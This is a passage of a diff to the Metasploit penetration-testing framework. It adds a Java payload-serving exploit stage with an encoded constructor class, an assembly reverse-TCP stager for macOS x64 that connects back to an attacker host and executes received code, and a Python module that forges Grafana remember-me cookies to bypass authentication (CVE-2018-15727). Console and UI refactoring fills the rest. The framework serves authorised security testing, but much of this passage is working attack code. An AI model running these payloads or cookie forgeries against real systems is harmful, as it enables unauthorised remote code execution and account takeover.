+    when "/#{class_name}.class"
+      vprint_good('Sending constructor class')
+      # This contains the constructor that will call our JavaPayload
+      res = constructor_class
+    # Stage 2
+    when '/metasploit/Payload.class'
+      vprint_good('Sending payload class')
+      # This is our JavaPayload as a compiled class
+      res = MetasploitPayloads.read('java/metasploit/Payload.class')
+    # Stage 3
+    when '/metasploit.dat'
+      vprint_good('Sending payload config')
+      # This tells the target how to address the payload; this is the magic!
+      res = payload_instance.stager_config
+    else
+      vprint_error('Sending 404')
+      return send_not_found(cli)
+    end
+
+    send_response(
+      cli,
+      res,
+      # file -I says application/x-java-applet, but I don't believe it
+      'Content-Type' => 'application/octet-stream'
+    )
+  end
+
+=begin javac Metasploit.java
+  import metasploit.Payload;
+
+  public class Metasploit {
+    public Metasploit() {
+      try {
+        Payload.main(null);
+      }
+      catch (Exception e) {}
+    }
+  }
+=end
+  def constructor_class
+    klass = Rex::Text.decode_base64(
+      <<~EOF
+        yv66vgAAADMAFQoABQAMCgANAA4HAA8HABAHABEBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAN
+        U3RhY2tNYXBUYWJsZQcAEAcADwwABgAHBwASDAATABQBABNqYXZhL2xhbmcvRXhjZXB0aW9u
+        AQAKTWV0YXNwbG9pdAEAEGphdmEvbGFuZy9PYmplY3QBABJtZXRhc3Bsb2l0L1BheWxvYWQB
+        AARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgAhAAQABQAAAAAAAQABAAYABwABAAgA
+        AAA3AAEAAgAAAA0qtwABAbgAAqcABEyxAAEABAAIAAsAAwABAAkAAAAQAAL/AAsAAQcACgAB
+        BwALAAAA
+      EOF
+    )
+
+    # Replace length-prefixed string "Metasploit" with a random one
+    klass.sub("\x00\x0aMetasploit", packed_class_name)
+  end
+
+  def class_name
+    @class_name ||= rand_text_alpha(8..42).capitalize
+  end
+
+  def packed_class_name
+    "#{[class_name.length].pack('n')}#{class_name}"
+  end
+
+end
+end
@@ -0,0 +1,65 @@
+# -*- coding: binary -*-
+
+#
+# This mixin is a wrapper around Net::LDAP
+#
+
+require 'net-ldap'
+
+module Msf
+module Exploit::Remote::LDAP
+
+  def initialize(info = {})
+    super
+
+    register_options([
+      Opt::RHOST,
+      Opt::RPORT(389)
+    ])
+  end
+
+  def rhost
+    datastore['RHOST']
+  end
+
+  def rport
+    datastore['RPORT']
+  end
+
+  def peer
+    "#{rhost}:#{rport}"
+  end
+
+  def discover_base_dn(ldap)
+    print_status('Searching root DSE for base DN')
+
+    unless (root_dse = ldap.search_root_dse)
+      print_error('Could not retrieve root DSE')
+      return
+    end
+
+    vprint_line(root_dse.to_ldif)
+
+    # NOTE: Net::LDAP converts attribute names to lowercase
+    unless root_dse[:namingcontexts]
+      print_error('Could not find namingContexts attribute')
+      return
+    end
+
+    if root_dse[:namingcontexts].empty?
+      print_error('Could not find base DN')
+      return
+    end
+
+    # NOTE: We assume the first namingContexts value is the base DN
+    base_dn = root_dse[:namingcontexts].first
+
+    print_good("Discovered base DN: #{base_dn}")
+    base_dn
+  rescue Net::LDAP::Error => e
+    print_error("#{e.class}: #{e.message}")
+    nil
+  end
+
+end
+end
@@ -9,7 +9,6 @@ require 'msf/core/exploit/check_module'
 require 'msf/core/exploit/brute'
 require 'msf/core/exploit/brutetargets'
 require 'msf/core/exploit/browser_autopwn'
-require 'msf/core/exploit/expect'

 # Payload
 require 'msf/core/exploit/egghunter'
@@ -73,6 +72,7 @@ require 'msf/core/exploit/sip'
 require 'msf/core/exploit/tincd'
 require 'msf/core/exploit/git'
 require 'msf/core/exploit/rdp'
+require 'msf/core/exploit/ldap'

 # Telephony
 require 'msf/core/exploit/dialup'
@@ -130,3 +130,4 @@ require 'msf/core/exploit/kerberos/client'
 # Other
 require 'msf/core/exploit/windows_constants'
 require 'msf/core/exploit/nuuo'
+require 'msf/core/exploit/expect'
@@ -53,7 +53,12 @@ module Msf::Module::Search
          match = false if mode == 0

          # Convert into a case-insensitive regex
-          r = Regexp.new(Regexp.escape(w), true)
+          utf8_buf = w.dup.force_encoding('UTF-8')
+          if utf8_buf.valid_encoding?
+            r = Regexp.new(Regexp.escape(utf8_buf), true)
+          else
+            return false
+          end

          case t
            when 'text'
@@ -44,8 +44,12 @@ module Msf::Modules::Metadata::Search
          match = false if mode == 0

          # Convert into a case-insensitive regex
-          regex = Regexp.new(Regexp.escape(search_term), true)
-
+          utf8_buf = search_term.dup.force_encoding('UTF-8')
+          if utf8_buf.valid_encoding?
+            regex = Regexp.new(Regexp.escape(utf8_buf), true)
+          else
+            return false
+          end
          case keyword
            when 'aka'
              match = [keyword, search_term] if (module_metadata.notes['AKA'] || []).any? { |aka| aka =~ regex }
@@ -0,0 +1,143 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/transport_config'
+require 'msf/core/payload/osx/x64/send_uuid'
+
+module Msf
+
+###
+#
+# Complex reverse_tcp payload generation for OSX ARCH_X64
+#
+###
+module Payload::Osx::ReverseTcp_x64
+
+  include Msf::Payload::TransportConfig
+  include Msf::Payload::Stager
+  include Msf::Payload::Osx::SendUUID_x64
+
+  #
+  # Register reverse_tcp specific options
+  #
+  def initialize(*args)
+    super
+  end
+
+  #
+  # By default, we don't want to send the UUID, but we'll send
+  # for certain payloads if requested.
+  #
+  def include_send_uuid
+    false
+  end
+
+  #
+  # Generate and compile the stager
+  #
+  def generate_reverse_tcp(opts={})
+    encoded_port = "%.8x" % [datastore['LPORT'].to_i,2].pack("vv").unpack("N").first
+    encoded_host = "%.8x" % Rex::Socket.addr_aton(datastore['LHOST']||"127.127.127.127").unpack("V").first
+    retry_count = datastore['StagerRetryCount']
+    seconds = datastore['StagerRetryWait']
+    sleep_seconds = seconds.to_i
+    sleep_nanoseconds = (seconds % 1 * 1000000000).to_i
+
+    stager_asm = %(
+    ; mmap(0x0, 0x1000, 0x7, 0x1002, 0x0, 0x0)
+    push 0
+    pop rdi
+    push 0x1000
+    pop rsi
+    push 7
+    pop rdx
+    push 0x1002
+    pop r10
+    push 0
+    pop r8
+    push 0
+    pop r9
+    push 0x20000c5
+    pop rax
+    syscall
+    jb failed
+
+    mov r12, rax
+    push 0
+    pop r10
+    push #{retry_count}
+    pop r11
+
+  socket:
+    ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
+    push    2
+    pop     rdi              ; rdi=AF_INET
+    push    1
+    pop     rsi              ; rsi=SOCK_STREAM
+    push    0
+    pop     rdx              ; rdx=IPPROTO_IP
+    push    0x2000061
+    pop     rax
+    syscall
+    jb retry
+
+    ; connect (sockfd, {AF_INET,4444,127.0.0.1}, 16);
+    mov     rdi, rax
+    mov     rax, 0x#{encoded_host}#{encoded_port}
+    push    rax
+    push    rsp
+    pop     rsi
+    push    16
+    pop     rdx
+    push    0x2000062
+    pop     rax
+    syscall
+    jb retry
+
+#{asm_send_uuid if include_send_uuid}
+
+    ; recvfrom(sockfd, addr, 0x1000)
+    mov rsi, r12
+    push 0x1000
+    pop rdx
+    push 0x200001d
+    pop rax
+    syscall
+    jb retry
+
+    call r12
+
+  retry:
+    dec r11
+    jz failed
+
+    push 0
+    pop rdi
+    push 0
+    pop rsi
+    push 0
+    pop rdx
+    push 0
+    pop r10
+    push   0x#{sleep_nanoseconds.to_s(16)}
+    push   0x#{sleep_seconds.to_s(16)}
+    push rsp
+    pop r8
+    push 0x200005d
+    pop rax
+    syscall
+    jmp socket
+
+  failed:
+    push   0x2000001
+    pop    rax
+    push   0x1
+    pop    rdi
+    syscall ; exit(1)
+    )
+
+    Metasm::Shellcode.assemble(Metasm::X64.new, stager_asm).encode_string
+  end
+
+end
+end
@@ -0,0 +1,42 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/uuid'
+
+module Msf
+
+###
+#
+# Basic send_uuid stub for OSX ARCH_X64 payloads
+#
+###
+
+module Payload::Osx::SendUUID_x64
+
+  #
+  # Generate assembly code that writes the UUID to the socket.
+  #
+  def asm_send_uuid(uuid=nil)
+    uuid ||= generate_payload_uuid
+    uuid_raw = uuid.to_raw
+
+    asm =%Q^
+      send_uuid:
+        call get_uuid_address     ; put uuid buffer on the stack
+        db #{raw_to_db(uuid_raw)} ; UUID
+      get_uuid_address:
+        pop rsi                   ; UUID address
+        push #{uuid_raw.length}   ; length of the UUID
+        pop rdx
+        push 0x2000085
+        pop rax
+        syscall                   ; sendto(sockfd, addr, length)
+    ^
+
+    asm
+  end
+
+end
+
+end
+
@@ -14,12 +14,10 @@ module Msf::Payload::Python
  #
  def py_create_exec_stub(cmd)
    # Base64 encoding is required in order to handle Python's formatting
-    # requirements in the while loop
-    b64_stub  = "import base64,sys;exec(base64.b64decode("
-    b64_stub << "{2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('"
-    b64_stub << Rex::Text.encode_base64(cmd)
-    b64_stub << "')))"
+
+    b64_stub = "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('#{ Rex::Text.encode_base64(cmd)}')[0]))"
    b64_stub
+
  end

 end
@@ -719,11 +719,13 @@ private

    if mname !~ /^(exploit|payload|nop|encoder|auxiliary|post|evasion)\//
      mname = mtype + "/" + mname
+    elsif !mname.start_with?(mtype)
+      error(400, "Client provided module type '#{mtype}' did not match expected type for '#{mname}'")
    end

    mod = self.framework.modules.create(mname)

-    error(500, "Invalid Module") if not mod
+    error(500, "Invalid Module") unless mod
    mod
  end

@@ -70,8 +70,7 @@ class Core
    "-v" => [ false, "Print more detailed info.  Use with -i and -l"  ])

  @@tip_opts = Rex::Parser::Arguments.new(
-    "-h" => [ false, "Help banner."                                   ],
-    "-l" => [ false, "List all available tips."                       ])
+    "-h" => [ false, "Help banner."                                   ])

  @@connect_opts = Rex::Parser::Arguments.new(
    "-h" => [ false, "Help banner."                                   ],
@@ -119,7 +118,7 @@ class Core
      "set"        => "Sets a context-specific variable to a value",
      "setg"       => "Sets a global variable to a value",
      "sleep"      => "Do nothing for the specified number of seconds",
-      "tip"        => "Show a useful productivity tip",
+      "tips"       => "Show a list of useful productivity tips",
      "threads"    => "View and manipulate background threads",
      "unload"     => "Unload a framework plugin",
      "unset"      => "Unsets one or more context-specific variables",
@@ -141,6 +140,10 @@ class Core
    @history_limit = 100
  end

+  def deprecated_commands
+    ['tip']
+  end
+
  #
  # Returns the name of the command dispatcher.
  #
@@ -257,20 +260,22 @@ class Core

  end

-  def cmd_tip_help
-    print_line "Usage: tip [options]"
+  def cmd_tips_help
+    print_line "Usage: tips [options]"
    print_line
-    print_line "Print a useful tip on how to use Metasploit"
+    print_line "Print a useful list of productivity tips on how to use Metasploit"
    print @@tip_opts.usage
  end

+  alias cmd_tip_help cmd_tips_help
+
  #
-  # Display a useful productivity tip to the user.
+  # Display useful productivity tips to the user.
  #
-  def cmd_tip(*args)
+  def cmd_tips(*args)
    if args.include?("-h")
      cmd_tip_help
-    elsif args.include?("-l")
+    else
      tbl = Table.new(
        Table::Style::Default,
        'Columns' => %w[Id Tip]
@@ -281,11 +286,11 @@ class Core
      end

      print(tbl.to_s)
-    else
-      print_line Tip.sample
    end
  end

+  alias cmd_tip cmd_tips
+
  def cmd_connect_help
    print_line "Usage: connect [options] <host> <port>"
    print_line
@@ -70,11 +70,13 @@ class Evasion
    handler = framework.modules.create('exploit/multi/handler')

    handler_opts = {
-      'Payload'        => mod.datastore['PAYLOAD'],
-      'LocalInput'     => driver.input,
-      'LocalOutput'    => driver.output,
-      'ExitOnSession'  => false,
-      'RunAsJob'       => true
+      'Payload'     => mod.datastore['PAYLOAD'],
+      'LocalInput'  => driver.input,
+      'LocalOutput' => driver.output,
+      'RunAsJob'    => true,
+      'Options'     => {
+        'ExitOnSession' => false,
+      }
    }

    handler.share_datastore(mod.datastore)
@@ -49,11 +49,13 @@ module Msf
            handler = framework.modules.create('exploit/multi/handler')

            handler_opts = {
-              'Payload'        => mod.refname,
-              'LocalInput'     => driver.input,
-              'LocalOutput'    => driver.output,
-              'ExitOnSession'  => false,
-              'RunAsJob'       => true
+              'Payload'     => mod.refname,
+              'LocalInput'  => driver.input,
+              'LocalOutput' => driver.output,
+              'RunAsJob'    => true,
+              'Options'     => {
+                'ExitOnSession' => false,
+              }
            }

            handler.datastore.merge!(mod.datastore)
@@ -120,7 +120,7 @@ class Driver < Msf::Ui::Driver
    # Report readline error if there was one..
    if !@rl_err.nil?
      print_error("***")
-      print_error("* WARNING: Unable to load readline: #{@rl_err}")
+      print_error("* Unable to load readline: #{@rl_err}")
      print_error("* Falling back to RbReadLine")
      print_error("***")
    end
@@ -133,14 +133,12 @@ class Driver < Msf::Ui::Driver
    load_db_config(opts['Config'])

    if !framework.db || !framework.db.active
-      print_error("***")
      if framework.db.error == "disabled"
-        print_error("* WARNING: Database support has been disabled")
+        print_warning("Database support has been disabled")
      else
        error_msg = "#{framework.db.error.class.is_a?(String) ? "#{framework.db.error.class} " : nil}#{framework.db.error}"
-        print_error("* WARNING: No database support: #{error_msg}")
+        print_warning("No database support: #{error_msg}")
      end
-      print_error("***")
    end

    # Register event handlers
@@ -357,13 +355,13 @@ class Driver < Msf::Ui::Driver

    # Check for modules that failed to load
    if framework.modules.module_load_error_by_path.length > 0
-      print_error("WARNING! The following modules could not be loaded!")
+      print_warning("The following modules could not be loaded!")

      framework.modules.module_load_error_by_path.each do |path, _error|
-        print_error("\t#{path}")
+        print_warning("\t#{path}")
      end

-      print_error(log_msg)
+      print_warning(log_msg)
    end

    if framework.modules.module_load_warnings.length > 0
@@ -14,7 +14,7 @@ module Msf
      end

      COMMON_TIPS = [
-        "View useful productivity tips with the #{highlight('tip')} command, or view them all with #{highlight('tip -l')}",
+        "View all productivity tips with the #{highlight('tips')} command",
        "Enable verbose logging with #{highlight('set VERBOSE true')}",
        "When in a module, use #{highlight('back')} to go back to the top level prompt",
        "Tired of setting RHOSTS for modules? Try globally setting it with #{highlight('setg RHOSTS x.x.x.x')}",
@@ -33,6 +33,8 @@ module Msf
        "Metasploit can be configured at startup, see #{highlight('msfconsole --help')} to learn more",
        "Display the Framework log using the #{highlight('log')} command, learn more with #{highlight('help log')}",
        "Adapter names can be used for IP params #{highlight('set LHOST eth0')}",
+        "Use #{highlight('sessions -1')} to interact with the last opened session",
+        "View missing module options with #{highlight('show missing')}",
      ].freeze
      private_constant :COMMON_TIPS

@@ -12,6 +12,7 @@ TLV_TYPE_EXT_WINDOW_ENUM_PID                = TLV_META_TYPE_UINT   | (TLV_TYPE_E
 TLV_TYPE_EXT_WINDOW_ENUM_HANDLE             = TLV_META_TYPE_QWORD  | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 3)
 TLV_TYPE_EXT_WINDOW_ENUM_TITLE              = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 4)
 TLV_TYPE_EXT_WINDOW_ENUM_INCLUDEUNKNOWN     = TLV_META_TYPE_BOOL   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 5)
+TLV_TYPE_EXT_WINDOW_ENUM_CLASSNAME     = TLV_META_TYPE_STRING   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 6)

 TLV_TYPE_EXT_SERVICE_ENUM_GROUP             = TLV_META_TYPE_GROUP  | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 10)
 TLV_TYPE_EXT_SERVICE_ENUM_NAME              = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 11)
@@ -1,56 +1,60 @@
 # -*- coding: binary -*-

 module Rex
-module Post
-module Meterpreter
-module Extensions
-module Extapi
-module Window
+  module Post
+    module Meterpreter
+      module Extensions
+        module Extapi
+          module Window
+            ###
+            #
+            # This meterpreter extension contains extended API functions for
+            # querying and managing desktop windows.
+            #
+            ###
+            class Window

-###
-#
-# This meterpreter extension contains extended API functions for
-# querying and managing desktop windows.
-#
-###
-class Window
+              def initialize(client)
+                @client = client
+              end

-  def initialize(client)
-    @client = client
-  end
+              # Enumerate all the windows on the target.
+              # If the specified parent window is nil, then all top-level windows
+              # are enumerated. Otherwise, all child windows of the specified
+              # parent window are enumerated.
+              def enumerate(include_unknown = false, parent_window = nil)
+                request = Packet.create_request('extapi_window_enum')

-  # Enumerate all the windows on the target.
-  # If the specified parent window is nil, then all top-level windows
-  # are enumerated. Otherwise, all child windows of the specified
-  # parent window are enumerated.
-  def enumerate(include_unknown = false, parent_window = nil)
-    request = Packet.create_request('extapi_window_enum')
+                if include_unknown
+                  request.add_tlv(TLV_TYPE_EXT_WINDOW_ENUM_INCLUDEUNKNOWN, true)
+                end

-    if include_unknown
-      request.add_tlv(TLV_TYPE_EXT_WINDOW_ENUM_INCLUDEUNKNOWN, true)
+                if !parent_window.nil?
+                  request.add_tlv(TLV_TYPE_EXT_WINDOW_ENUM_HANDLE, parent_window)
+                end
+
+                response = client.send_request(request)
+
+                windows = []
+
+                response.each(TLV_TYPE_EXT_WINDOW_ENUM_GROUP) do |w|
+                  windows << {
+                    pid: w.get_tlv_value(TLV_TYPE_EXT_WINDOW_ENUM_PID),
+                    handle: w.get_tlv_value(TLV_TYPE_EXT_WINDOW_ENUM_HANDLE),
+                    title: w.get_tlv_value(TLV_TYPE_EXT_WINDOW_ENUM_TITLE),
+                    class_name: w.get_tlv_value(TLV_TYPE_EXT_WINDOW_ENUM_CLASSNAME)
+                  }
+                end
+
+                windows.sort_by { |w| w[:pid] }
+              end
+
+              attr_accessor :client
+
+            end
+          end
+        end
+      end
    end
-
-    if not parent_window.nil?
-      request.add_tlv(TLV_TYPE_EXT_WINDOW_ENUM_HANDLE, parent_window)
-    end
-
-    response = client.send_request(request)
-
-    windows = []
-
-    response.each(TLV_TYPE_EXT_WINDOW_ENUM_GROUP) { |w|
-      windows << {
-        :pid    => w.get_tlv_value(TLV_TYPE_EXT_WINDOW_ENUM_PID),
-        :handle => w.get_tlv_value(TLV_TYPE_EXT_WINDOW_ENUM_HANDLE),
-        :title  => w.get_tlv_value(TLV_TYPE_EXT_WINDOW_ENUM_TITLE)
-      }
-    }
-
-    windows.sort_by { |w| w[:pid] }
  end
-
-  attr_accessor :client
-
 end
-
-end; end; end; end; end; end
@@ -1,122 +1,134 @@
 # -*- coding: binary -*-
+
 require 'rex/post/meterpreter'

 module Rex
-module Post
-module Meterpreter
-module Ui
+  module Post
+    module Meterpreter
+      module Ui
+        ###
+        #
+        # Extended API window management user interface.
+        #
+        ###
+        class Console::CommandDispatcher::Extapi::Window

-###
-#
-# Extended API window management user interface.
-#
-###
-class Console::CommandDispatcher::Extapi::Window
+          Klass = Console::CommandDispatcher::Extapi::Window

-  Klass = Console::CommandDispatcher::Extapi::Window
+          include Console::CommandDispatcher

-  include Console::CommandDispatcher
+          #
+          # List of supported commands.
+          #
+          def commands
+            all = {
+              'window_enum' => 'Enumerate all current open windows'
+            }
+            reqs = {
+              'window_enum' => [ 'extapi_window_enum' ]
+            }
+            filter_commands(all, reqs)
+          end

-  #
-  # List of supported commands.
-  #
-  def commands
-    all = {
-      "window_enum" => "Enumerate all current open windows"
-    }
-    reqs = {
-      "window_enum" => [ "extapi_window_enum" ],
-    }
-    filter_commands(all, reqs)
-  end
+          #
+          # Name for this dispatcher
+          #
+          def name
+            'Extapi: Window Management'
+          end

-  #
-  # Name for this dispatcher
-  #
-  def name
-    "Extapi: Window Management"
-  end
+          #
+          # Options for the window_enum command.
+          #
+          @@window_enum_opts = Rex::Parser::Arguments.new(
+            '-h' => [ false, 'Help banner' ],
+            '-p' => [ true, 'Parent window handle, used to enumerate child windows' ],
+            '-u' => [ false, 'Include unknown/untitled windows in the result set' ],
+            '-c' => [ true, 'Specify the window class name to display. e.g. Edit,Button etc.' ]
+          )

-  #
-  # Options for the window_enum command.
-  #
-  @@window_enum_opts = Rex::Parser::Arguments.new(
-    "-h" => [ false, "Help banner" ],
-    "-p" => [ true,  "Parent window handle, used to enumerate child windows" ],
-    "-u" => [ false, "Include unknown/untitled windows in the result set" ]
-  )
+          def window_enum_usage
+            print(
+              "\nUsage: window_enum [-h] [-p parent_window] [-u]\n\n" \
+              "Enumerate the windows on the target.\n\n" \
+              "Enumeration returns the Process ID and Window Handle for each window\n" \
+              "found. The Window Handle can be used for further calls to window_enum\n" \
+              "or the railgun API.\n" +
+              @@window_enum_opts.usage +
+              "Note: Not all windows can be enumerated. An attempt to enumerate\n" \
+              "      the children of such a window will result in a failure with the\n" \
+              "      message \"Operation failed: The parameter is incorrect.\"\n"\
+              "      Enumerable maximum text length is 256.\n\n"
+            )
+          end

-  def window_enum_usage
-    print(
-      "\nUsage: window_enum [-h] [-p parent_window] [-u]\n\n" +
-      "Enumerate the windows on the target.\n\n" +
-      "Enumeration returns the Process ID and Window Handle for each window\n" +
-      "found. The Window Handle can be used for further calls to window_enum\n" +
-      "or the railgun API.\n" +
-      @@window_enum_opts.usage +
-      "Note: Not all windows can be enumerated. An attempt to enumerate\n" +
-      "      the children of such a window will result in a failure with the\n"+
-      "      message \"Operation failed: The parameter is incorrect.\"\n\n")
-  end
+          #
+          # Enumerate top-level windows.
+          #
+          def cmd_window_enum(*args)
+            parent_window = nil
+            include_unknown = false
+            window_class_name = nil

-  #
-  # Enumerate top-level windows.
-  #
-  def cmd_window_enum(*args)
-    parent_window = nil
-    include_unknown = false
+            @@window_enum_opts.parse(args) do |opt, _idx, val|
+              case opt
+              when '-u'
+                include_unknown = true
+              when '-p'
+                parent_window = val.to_i
+                if parent_window == 0
+                  window_enum_usage
+                  return true
+                end
+              when '-h'
+                window_enum_usage
+                return true
+              when '-c'
+                window_class_name = val.to_s
+                if window_class_name == ''
+                  window_enum_usage
+                  return true
+                end
+              end
+            end
+
+            windows = client.extapi.window.enumerate(include_unknown, parent_window)
+
+            header = parent_window ? "Child windows of #{parent_window}" : 'Top-level windows'
+            columns = [ 'PID', 'Handle', 'ClassName', 'Title']
+            table = Rex::Text::Table.new(
+              'Header' => header,
+              'Indent' => 0,
+              'SortIndex' => columns.index('Handle'),
+              'Columns' => columns
+            )
+
+            windows.each do |w|
+              if window_class_name.nil?
+                table << [w[:pid], w[:handle], w[:class_name], w[:title]]
+              elsif (w[:class_name] == window_class_name)
+                table << [w[:pid], w[:handle], w[:class_name], w[:title]]
+              else
+                next
+              end
+            end
+
+            print_line
+            print_line(table.to_s)
+
+            if parent_window.nil?
+              print_line("Total top-level Windows: #{windows.length}")
+            else
+              print_line("Total child Windows: #{windows.length}")
+            end
+
+            print_line
+
+            return true
+          end

-    @@window_enum_opts.parse(args) { |opt, idx, val|
-      case opt
-      when "-u"
-        include_unknown = true
-      when "-p"
-        parent_window = val.to_i
-        if parent_window == 0
-          window_enum_usage
-          return true
        end
-      when "-h"
-        window_enum_usage
-        return true
      end
-    }
-
-    windows = client.extapi.window.enumerate(include_unknown, parent_window)
-
-    header = parent_window ? "Child windows of #{parent_window}" : "Top-level windows"
-
-    table = Rex::Text::Table.new(
-      'Header'    => header,
-      'Indent'    => 0,
-      'SortIndex' => 0,
-      'Columns'   => [
-        'PID', 'Handle', 'Title'
-      ]
-    )
-
-    windows.each { |w|
-      table << [w[:pid], w[:handle], w[:title]]
-    }
-
-    print_line
-    print_line(table.to_s)
-
-    if parent_window.nil?
-      print_line("Total top-level Windows: #{windows.length}")
-    else
-      print_line("Total child Windows: #{windows.length}")
    end
-
-    print_line
-
-    return true
  end
-
 end
-
-end
-end
-end
-end
-
@@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
  # are needed when there's no database
  spec.add_runtime_dependency 'metasploit-model', '~> 2.0.4'
  # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '1.3.86'
+  spec.add_runtime_dependency 'metasploit-payloads', '1.3.91'
  # Needed for the next-generation POSIX Meterpreter
  spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.5.21'
  # Needed by msfgui and other rpc components
@@ -125,6 +125,8 @@ Gem::Specification.new do |spec|
  # Needed by auxiliary/gather/http_pdf_authors module
  spec.add_runtime_dependency 'pdf-reader'
  spec.add_runtime_dependency 'ruby-macho'
+  # Needed for mongodb/bson
+  spec.add_runtime_dependency 'bson'

  #
  # Protocol Libraries
@@ -135,6 +137,7 @@ Gem::Specification.new do |spec|
  spec.add_runtime_dependency 'ed25519' # Adds ed25519 keys for net-ssh
  spec.add_runtime_dependency 'bcrypt_pbkdf'
  spec.add_runtime_dependency 'ruby_smb'
+  spec.add_runtime_dependency 'net-ldap'

  #
  # REX Libraries
@@ -0,0 +1,195 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+# standard modules
+import binascii
+import hashlib
+import logging
+import os
+import re
+
+from metasploit import module
+
+# extra modules
+dependencies_requests_missing = False
+try:
+    import requests
+except ImportError:
+    dependencies_requests_missing = True
+
+dependencies_cryptography_missing = False
+try:
+    from cryptography.hazmat.primitives.ciphers.aead import AESGCM
+except ImportError:
+    dependencies_cryptography_missing = True
+
+
+metadata = {
+    'name': 'Grafana 2.0 through 5.2.2 authentication bypass for LDAP and OAuth',
+    'description': '''
+        This module generates a remember me cookie for a valid username. Through unpropper seeding 
+        while userdate are requested from LDAP or OAuth it's possible to craft a valid remember me cookie. 
+        This cookie can be used for bypass authentication for everyone knowing a valid username.
+    ''',
+    'authors': [
+        'Rene Riedling',
+        'Sebastian Solnica'  # Original Discovered
+    ],
+    'date': '2019-08-14',  # set to date of creation
+    'license': 'MSF_LICENSE',
+    'references': [
+        {'type': 'cve', 'ref': '2018-15727'},
+        {'type': 'url', 'ref': 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15727'},
+        {'type': 'url', 'ref': 'https://grafana.com/blog/2018/08/29/grafana-5.2.3-and-4.6.4-released-with-important-security-fix/'}
+    ],
+    'type': 'single_scanner',
+    'options': {
+        'VERSION': {'type': 'enum', 'description': 'Grafana version: "2-4" or "5"', 'required': True, 'default': '5', 'values': ['2-4', '5']},
+        'USERNAME': {'type': 'string', 'description': 'Valid username', 'required': False},
+        'RHOSTS': {'type': 'address', 'description': 'Address of target', 'required': True, 'default': '127.0.0.1'},
+        'RPORT': {'type': 'port', 'description': 'Port of target', 'required': True, 'default': 3000},
+        'COOKIE': {'type': 'string', 'description': 'Decrypt captured cookie', 'required': False},
+        'TARGETURI': {'type': 'string', 'description': 'Base URL of grafana instance', 'required': False, 'default': '/'},
+        'SSL': {'type': 'bool', 'description': 'set SSL/TLS based connection', 'required': True, 'default': False}
+    }
+}
+
+
+def encrypt_version5(username):
+    salt = b''
+    iterations = 1000
+    key = hashlib.pbkdf2_hmac('sha256', salt, salt, iterations, 16)
+    aesgcm = AESGCM(key)
+    nonce = os.urandom(12)
+    username = username.encode()
+    ct = aesgcm.encrypt(nonce, username, None)
+    cookie = str(binascii.hexlify(nonce), 'ascii') + \
+        str(binascii.hexlify(ct), 'ascii')
+    return cookie
+
+
+def encrypt_version4(username):
+    salt = hashlib.md5(''.encode("utf-8")).hexdigest().encode()
+    iterations = 1000
+    key = hashlib.pbkdf2_hmac('sha256', salt, salt, iterations, 16)
+    aesgcm = AESGCM(key)
+    nonce = os.urandom(12)
+    username = username.encode()
+    ct = aesgcm.encrypt(nonce, username, None)
+    cookie = str(binascii.hexlify(nonce), 'ascii') + \
+        str(binascii.hexlify(ct), 'ascii')
+    return cookie
+
+
+def decrypt_version5(cookie):
+    salt = b''
+    iterations = 1000
+    key = hashlib.pbkdf2_hmac('sha256', salt, salt, iterations, 16)
+    aesgcm = AESGCM(key)
+    nonce = binascii.unhexlify(cookie[:24])
+    ct = binascii.unhexlify(cookie[24:len(cookie)])
+    username = str(aesgcm.decrypt(nonce, ct, None), 'ascii')
+    return username
+
+
+def decrypt_version4(cookie):
+    salt = hashlib.md5(''.encode("utf-8")).hexdigest().encode()
+    iterations = 1000
+    key = hashlib.pbkdf2_hmac('sha256', salt, salt, iterations, 16)
+    aesgcm = AESGCM(key)
+    nonce = binascii.unhexlify(cookie[:24])
+    ct = binascii.unhexlify(cookie[24:len(cookie)])
+    username = str(aesgcm.decrypt(nonce, ct, None), 'ascii')
+    return username
+
+
+def run(args):
+    if dependencies_requests_missing:
+        logging.error('Module dependency (requests) is missing, cannot continue')
+        return
+    
+    if dependencies_cryptography_missing:
+        logging.error('Module dependency (cryptography) is missing, cannot continue')
+        return
+    
+    if args['VERSION'] == "5":
+        try:
+            username = args['USERNAME']
+            cookie = encrypt_version5(args['USERNAME'])
+            module.log("Encrypted remember cookie: "+cookie, "good")
+        except:
+            module.log(
+                "No username set, trying to decrypt it from cookie.", "warning")
+            try:
+                username = decrypt_version5(args['COOKIE'])
+                module.log("Decrypted username: "+username, "good")
+                cookie = args['COOKIE']
+            except:
+                module.log("Unable to set username", "error")
+                return
+    elif args['VERSION'] == "2-4":
+        try:
+            username = args['USERNAME']
+            cookie = encrypt_version4(args['USERNAME'])
+            module.log("Encrypted remember cookie: "+cookie, "good")
+        except:
+            module.log(
+                "No username set, trying to decrypt it from cookie.", "warning")
+            try:
+                username = decrypt_version4(args['COOKIE'])
+                module.log("Decrypted username: "+username, "good")
+                cookie = args['COOKIE']
+            except:
+                module.log("Unable to set username", "error")
+                return
+    else:
+        module.log("Version not supported.", "error")
+
+    try:
+        cookies = {'grafana_remember': cookie, 'grafana_user': username}
+
+        if args['SSL'] == "false":
+            if args['TARGETURI'].endswith('/'):
+                url = "http://" + args['RHOSTS'] + ":" + \
+                    args['RPORT'] + args['TARGETURI'] + "login/"
+            else:
+                url = "http://" + args['RHOSTS'] + ":" + \
+                    args['RPORT'] + args['TARGETURI'] + "/login/"
+        elif args['SSL'] == "true":
+            if args['TARGETURI'].endswith('/'):
